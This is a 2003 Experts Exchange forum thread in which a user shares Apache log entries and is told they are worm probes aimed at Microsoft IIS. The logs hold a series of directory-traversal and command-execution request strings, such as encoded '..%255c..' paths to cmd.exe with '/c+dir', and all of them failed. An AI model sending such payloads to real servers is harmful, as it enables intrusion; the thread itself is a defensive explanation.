?
Solved

apache logs

Posted on 2003-10-24
2
Medium Priority
?
261 Views
Last Modified: 2010-03-04
i have the following in my apache logs ... waht does this mean ?

pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236

thanks in advance
0
Comment
Question by:sanctify
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
2 Comments
 
LVL 17

Accepted Solution

by:
dorward earned 200 total points
ID: 9619497
It means someone (or more likely someTHING [a worm]) is trying to exploit security holes in Microsoft's contribution to the webserver market.

Apache users don't need to worry about it, other then the slightly untity log files.

IIS users should switch to Apache (or install all the security patches).
0
 
LVL 1

Author Comment

by:sanctify
ID: 9621405
ok thanks .. its good to know im secure with apache
0

Featured Post

ATEN's HDBaseT Presentation at InfoComm 2017

Hear ATEN Product Manager YT Liang review HDBaseT technology, highlighting ATEN’s latest solutions as they relate to real-world applications during her presentation at the HDBaseT booth at InfoComm 2017.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Over the last year I have answered a couple of basic URL rewriting questions several times so I thought I might as well have a stab at: explaining the basics, providing a few useful links and consolidating some of the most common queries into a sing…
In Solr 4.0 it is possible to atomically (or partially) update individual fields in a document. This article will show the operations possible for atomic updating as well as setting up your Solr instance to be able to perform the actions. One major …
NetCrunch network monitor is a highly extensive platform for network monitoring and alert generation. In this video you'll see a live demo of NetCrunch with most notable features explained in a walk-through manner. You'll also get to know the philos…
Sometimes it takes a new vantage point, apart from our everyday security practices, to truly see our Active Directory (AD) vulnerabilities. We get used to implementing the same techniques and checking the same areas for a breach. This pattern can re…
Suggested Courses
Course of the Month10 days, 20 hours left to enroll

770 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question